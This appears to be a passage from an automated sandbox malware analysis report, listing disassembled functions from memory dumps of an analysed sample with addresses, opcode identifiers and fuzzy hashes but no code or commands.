                                                  • Instruction Fuzzy Hash: EDD19E74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 0071DD58 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: daa99e609fb98522df5798a54010604c01f688f7783a1ce274690bcb30fb27ce
                                                  • Instruction ID: e93025ce620ad720ccf1aa3ce3b42bf248751a56517a4d21e073622414eea5d4
                                                  • Opcode Fuzzy Hash: daa99e609fb98522df5798a54010604c01f688f7783a1ce274690bcb30fb27ce
                                                  • Instruction Fuzzy Hash: 7ED19F74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 0071F540 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd4b9ec619d2196ba8bf178afae70a6121a0d8ba00b893eab0bad7aa56acb30e
                                                  • Instruction ID: dcb19bf2efad376ec98b29cae53600e3ffff41c9ab2a408a7057953046c938d8
                                                  • Opcode Fuzzy Hash: cd4b9ec619d2196ba8bf178afae70a6121a0d8ba00b893eab0bad7aa56acb30e
                                                  • Instruction Fuzzy Hash: 99D1A074E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Function 0071CA38 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73e664cabbe7ecad809ceee343da555140766fabc6f16e5d65c960770cbbb810
                                                  • Instruction ID: 37e57a238b68ce7d5821c563e42dd70ec6db443d44144812009945e13b9e4e2f
                                                  • Opcode Fuzzy Hash: 73e664cabbe7ecad809ceee343da555140766fabc6f16e5d65c960770cbbb810
                                                  • Instruction Fuzzy Hash: D2D1A074E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Function 0071E220 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b56caaae2f2c3232871ee5e5825249d77a30a5a5062bda3cce2b9ee1a56f41f9
                                                  • Instruction ID: 3d28e82f0d434e91ae14e570c2951e31baa1b6227e7cd6f131ddd9e6a72b2a6f
                                                  • Opcode Fuzzy Hash: b56caaae2f2c3232871ee5e5825249d77a30a5a5062bda3cce2b9ee1a56f41f9
                                                  • Instruction Fuzzy Hash: F5D19F74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Function 00718C10 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5708b146597ee276e9c6927a6c869f2f8af7a1016591fd71e02feb1037a4ad90
                                                  • Instruction ID: f03cb913a6f95fb687bc424dde17b33cf86ff8b46365722adf1bdbca48dd7a79
                                                  • Opcode Fuzzy Hash: 5708b146597ee276e9c6927a6c869f2f8af7a1016591fd71e02feb1037a4ad90
                                                  • Instruction Fuzzy Hash: 39D19F74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E85CF51
                                                  Function 0071B718 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1c06bcdfa5516d62f623dec1c5da4518e31b8b9f3908283b6e7c188dae13304
                                                  • Instruction ID: 319c7ea1125dd3bc464124f90ecfcbf3a85bc29fac85d499d88d0b77eb567f41
                                                  • Opcode Fuzzy Hash: e1c06bcdfa5516d62f623dec1c5da4518e31b8b9f3908283b6e7c188dae13304
                                                  • Instruction Fuzzy Hash: 03D19F74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Function 0071CF00 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 341aceb1469facc8067960584a86cd161ced87c8ee43bec4d515596034c9008f
                                                  • Instruction ID: 81bdffcf23211088cd69e7611794aed1a627d7a4e5664c5f374a4714829a49ae
                                                  • Opcode Fuzzy Hash: 341aceb1469facc8067960584a86cd161ced87c8ee43bec4d515596034c9008f
                                                  • Instruction Fuzzy Hash: 4DD19074E002188FDB54DFA5C994B9DBBB2FB89300F5085AAD409AB394DB355E81CF51
                                                  Function 0071FA08 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 360662add28f3d5a4eb93c1ac094839e9af1800db59d59b6553e475c6c15a102
                                                  • Instruction ID: c8a4d3d2fb1827a02593ac2f75d9700178611c2cb6566a0b70f03cf8c354b98d
                                                  • Opcode Fuzzy Hash: 360662add28f3d5a4eb93c1ac094839e9af1800db59d59b6553e475c6c15a102
                                                  • Instruction Fuzzy Hash: A2D1AF74E002188FDB54DFA5C894B9DBBB2FF89300F6081AAD409AB395DB359E85CF51
                                                  Function 0071A3F8 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f51f94cbf06a9cf0e89ec36fe8db0613092c518b27fd9d62c8b6d31191bb14e6
                                                  • Instruction ID: 3ce1806d22abc8cc7de7db6f222b4ef6d500e3ea30331ec04f41b59e20a7577a
                                                  • Opcode Fuzzy Hash: f51f94cbf06a9cf0e89ec36fe8db0613092c518b27fd9d62c8b6d31191bb14e6
                                                  • Instruction Fuzzy Hash: 2CD1AE74E012188FDB14DFA5C894B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 0071BBE0 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 492c041c36578a6236bb0fb99aab78b18d843583fcffa2dcadf522c0e7039fc0
                                                  • Instruction ID: 81cb2d1f1b8d52b05a566172e9ad01cc017e2ccebfa4ddb33b5a7df3a151cfd0
                                                  • Opcode Fuzzy Hash: 492c041c36578a6236bb0fb99aab78b18d843583fcffa2dcadf522c0e7039fc0
                                                  • Instruction Fuzzy Hash: B8D19E74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E85CF51
                                                  Function 0071E6E8 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: affc07a8b2995b82d6d10d71069955c2c68499234a6dcce668b3f1154abe1b6f
                                                  • Instruction ID: 4d9738fe925d3d081528831c380b7df615912224979ea75896809828a26bb67e
                                                  • Opcode Fuzzy Hash: affc07a8b2995b82d6d10d71069955c2c68499234a6dcce668b3f1154abe1b6f
                                                  • Instruction Fuzzy Hash: 80D19074E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Function 007190D8 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bca8a5bde99063576ea4b0c37947b3f942ac6b1e673b06750454a8563d5c4542
                                                  • Instruction ID: 465769eded59d7b249cf0af2f1c431fa4042f985abcdecfa54ec8b5fb5bf2974
                                                  • Opcode Fuzzy Hash: bca8a5bde99063576ea4b0c37947b3f942ac6b1e673b06750454a8563d5c4542
                                                  • Instruction Fuzzy Hash: D4D1AF74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Function 0071A8C0 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41c7fd8a5ff2f3375c8d6bd4bafcefdd277ade9b8d810d9ba71b49c43bc74fba
                                                  • Instruction ID: ddd8330626c3117e087d7f9f410870ef2bb1e20faae609f2235708642c6ea198
                                                  • Opcode Fuzzy Hash: 41c7fd8a5ff2f3375c8d6bd4bafcefdd277ade9b8d810d9ba71b49c43bc74fba
                                                  • Instruction Fuzzy Hash: 42D1AE74E012188FDB14DFA5D994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 0071D3C8 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7baba5186c10930d647ab93347b0d10168e42d202a1f6719e6b544d596005c20
                                                  • Instruction ID: 3fdb6764e9dc029c7c5a78fbc1d2a2e51c983cd0971a3dda051dcda0e8bdd786
                                                  • Opcode Fuzzy Hash: 7baba5186c10930d647ab93347b0d10168e42d202a1f6719e6b544d596005c20
                                                  • Instruction Fuzzy Hash: 17D19074E002188FDB64DFA5C994B9DBBB2FF89300F5481AAD409AB394DB359E81CF51
                                                  Function 0071EBB0 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2fe19aa49829aa8bed7a3ad62f39adb790b22c3aeff28290a6ab8109c710c43f
                                                  • Instruction ID: dd37907e3f7aeed6a9c6408f6acfaf648d39566a6099cecb3f85e6f012cd0b7b
                                                  • Opcode Fuzzy Hash: 2fe19aa49829aa8bed7a3ad62f39adb790b22c3aeff28290a6ab8109c710c43f
                                                  • Instruction Fuzzy Hash: 26D1A074E002188FDB14DFA5C894B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Function 007195A0 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e26b65c1d94c00f61854e1ad491fed127111491edae999c8871d8578caf5ede
                                                  • Instruction ID: e3e8127515150260d93261679d7d8951b61ea3dde7163caf3a46f3aea1de8a4b
                                                  • Opcode Fuzzy Hash: 8e26b65c1d94c00f61854e1ad491fed127111491edae999c8871d8578caf5ede
                                                  • Instruction Fuzzy Hash: 85D19F74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Function 0071C0A8 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aaac7b83884cc70551c1b3f83cb751126a6e382d48c152138d444b2a4e13715a
                                                  • Instruction ID: d3b141b993523b53a8d6b57af9b860859eb85313622ae2886fb2a458cafc26b2
                                                  • Opcode Fuzzy Hash: aaac7b83884cc70551c1b3f83cb751126a6e382d48c152138d444b2a4e13715a
                                                  • Instruction Fuzzy Hash: A8D19074E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Function 0071D890 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c73cab8d35c149d41a1fc606a1995d5b3186387844095efe886ac3362c441ae8
                                                  • Instruction ID: 1c00c69bc1c0870eab59066aa2b7756295b9cd23c8f957a6daa6f1176e2afffb
                                                  • Opcode Fuzzy Hash: c73cab8d35c149d41a1fc606a1995d5b3186387844095efe886ac3362c441ae8
                                                  • Instruction Fuzzy Hash: D8D1A174E002188FDB24DFA5D994B9DBBB2FF89300F6085AAD409AB394DB355E81CF51
                                                  Function 0071AD88 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d4d31f981918ade8789dfcc9a57fc836db5e51fc3f4d82f091bfad0f54ba9a3
                                                  • Instruction ID: 3f0455c27e7d14ba57bf80cfd6fe06f8fc07ab710aa1056a32b289be1eef07e0
                                                  • Opcode Fuzzy Hash: 7d4d31f981918ade8789dfcc9a57fc836db5e51fc3f4d82f091bfad0f54ba9a3
                                                  • Instruction Fuzzy Hash: A3D1B174E002188FDB54DFA5D894B9DBBB2FF89300F6081AAD409AB394DB359E85CF51
                                                  Function 001CEEB8 Relevance: .3, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a1c78515f704d36bbc9f5c12191922ce97856c4e13a3a2fd0f71b9fafa16a91
                                                  • Instruction ID: d560586aca298689cd80b1bb58f8595906114eb3fe0b983a46fdf4d1618e3ab8
                                                  • Opcode Fuzzy Hash: 3a1c78515f704d36bbc9f5c12191922ce97856c4e13a3a2fd0f71b9fafa16a91
                                                  • Instruction Fuzzy Hash: CAD1BF74E002188FDB14DFA5D994B9DBBB2FF89300F1481A9D409AB355EB319D82CF51
                                                  Function 001CF351 Relevance: .3, Instructions: 281COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a054a43f6d2b90e23f10fc2cbf9cd0f8a6fe808fe02b62dfec82700d2b325679
                                                  • Instruction ID: 82a563eacc607b2c59bd13dae1f3b586747582ff3f78ff212b2a33df75fa0b8f
                                                  • Opcode Fuzzy Hash: a054a43f6d2b90e23f10fc2cbf9cd0f8a6fe808fe02b62dfec82700d2b325679
                                                  • Instruction Fuzzy Hash: BCD1B074E002188FDB54DFA5D950B9DBBB2FF89300F6481AAD409AB365EB319D82CF51
                                                  Function 001CEA20 Relevance: .3, Instructions: 278COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc1b31eaf30c5ea07d1a29facd8bb0d043f63d4cfb2e17fb964c104231403dc5
                                                  • Instruction ID: d03db4d348165a85f3559aa390d6536c7fe4ec8a4ee17ac91bef17dd1d2b7608
                                                  • Opcode Fuzzy Hash: bc1b31eaf30c5ea07d1a29facd8bb0d043f63d4cfb2e17fb964c104231403dc5
                                                  • Instruction Fuzzy Hash: 2ED1AE74E002188FDB54DFA5C994B9DBBB2FF89300F2485AAD809AB355EB319D81CF51
                                                  Function 001CF7E8 Relevance: .3, Instructions: 277COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f98ea8a892d081f89bb2496bc881c660bf744c4077479f6a5559b7414031d8f2
                                                  • Instruction ID: 328b01e2274f8cda543cec4028e7d112d12dc5cf558bab85784404344917bb08
                                                  • Opcode Fuzzy Hash: f98ea8a892d081f89bb2496bc881c660bf744c4077479f6a5559b7414031d8f2
                                                  • Instruction Fuzzy Hash: 95D1BF74E002188FDB54DFA5D990B9DBBB2FF89300F5481A9D809AB365EB319D82CF51
                                                  Function 008DF2A8 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0513a09164ecad9298db1327e14cad3df4208994bb15ffc69814fc84377aa344
                                                  • Instruction ID: e799eb3c1ffdf578a429dbb8cbf9a6b4f36ac6278a76acac02dffa8941333f5c
                                                  • Opcode Fuzzy Hash: 0513a09164ecad9298db1327e14cad3df4208994bb15ffc69814fc84377aa344
                                                  • Instruction Fuzzy Hash: 33D1AE74E002188FDB54DFA5D990B9DBBB2FF89300F6481AAD809AB365EB315D81CF51
                                                  Function 008DE4E0 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5c3234cc3fea9f66c2d6f66473ee7c02b9d138fa2c3b80233e05bf8f21adf933
                                                  • Instruction ID: e36f94ec7ede3c14dd9c3461ce0ab32b2e7b0aae0fe47b98670fb5a123d62a29
                                                  • Opcode Fuzzy Hash: 5c3234cc3fea9f66c2d6f66473ee7c02b9d138fa2c3b80233e05bf8f21adf933
                                                  • Instruction Fuzzy Hash: 1AD1AF74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD809AB365EB315D81CF51
                                                  Function 008DEE10 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: b363605e2f05c0e3201b493623aeb0d537589e819dd25c65d59295cc0d735b54
                                                  • Instruction ID: 71626311b8f4eebe98727f4a01bfef2aa319ef5e192e7182e824b7a91390a2c6
                                                  • Opcode Fuzzy Hash: b363605e2f05c0e3201b493623aeb0d537589e819dd25c65d59295cc0d735b54
                                                  • Instruction Fuzzy Hash: 79D1AF78E002188FDB54DFA5C990B9DBBB2FF89300F6481AAD809AB355EB315D81CF51
                                                  Function 008DF740 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8081464fe2e064984963827f7004a895ec0b20284e1a4e6616285bc207d58f97
                                                  • Instruction ID: a5d651552e492df544bc2a9674db5f41df6014811c1d8adbe357918e37f108a4
                                                  • Opcode Fuzzy Hash: 8081464fe2e064984963827f7004a895ec0b20284e1a4e6616285bc207d58f97
                                                  • Instruction Fuzzy Hash: C4D1AE74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD809AB365EB315D81CF51
                                                  Function 008DE978 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 636c62404d55504e5d77822aed0ed9773bbb71bc4d073c47e1c11bf37fc59abd
                                                  • Instruction ID: a5f1ad1fbba3be27a2aa2d2e4588d720191872538ed01775e53ae70602ab4ab2
                                                  • Opcode Fuzzy Hash: 636c62404d55504e5d77822aed0ed9773bbb71bc4d073c47e1c11bf37fc59abd
                                                  • Instruction Fuzzy Hash: 21D1AE74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD809AB355EB315D81CF51
                                                  Function 00710970 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7da718c270718e183eddc806f023a7c31bb9c02984b8ec60237c75fcc5a93929
                                                  • Instruction ID: b1ad0c09cb36af5e58e608d475eb89be8734686c08f13a3e7f8681395e3e38a6
                                                  • Opcode Fuzzy Hash: 7da718c270718e183eddc806f023a7c31bb9c02984b8ec60237c75fcc5a93929
                                                  • Instruction Fuzzy Hash: 4AD1BF74E002188FDB54DFA9C990B9DBBB2FF89300F2481A9D409AB355EB356D81CF51
                                                  Function 00717770 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d0658197db2a5faa49dc96dd077d5ea5319e6ca39aacc028fa1725d3e1488a1
                                                  • Instruction ID: 823fd8b2f359965db81f81d51387737b0647c1f301b5aa9071b231037f9d0d47
                                                  • Opcode Fuzzy Hash: 9d0658197db2a5faa49dc96dd077d5ea5319e6ca39aacc028fa1725d3e1488a1
                                                  • Instruction Fuzzy Hash: 09D1BF74E002188FDB54DFA9C994B9DBBB2FF89300F2481A9D409AB395EB355D81CF51
                                                  Function 00716078 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e10482635678a8fd1b304bbf39461bcd26566d9eca86afcbbb4e6a9ed16de398
                                                  • Instruction ID: 5ef72767b20e7a1ff6e81e08b0a82135896bdfcb8e149e34312f5d61d5178cf3
                                                  • Opcode Fuzzy Hash: e10482635678a8fd1b304bbf39461bcd26566d9eca86afcbbb4e6a9ed16de398
                                                  • Instruction Fuzzy Hash: C9D1AF74E002188FDB54DFA5C990B9DBBB2FF89300F2481A9D809AB395EB355E85CF51
                                                  Function 00713760 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 903b80227118c56f2a013973410bbbf0a75856caceacc72e6627b2bbedd7a9a9
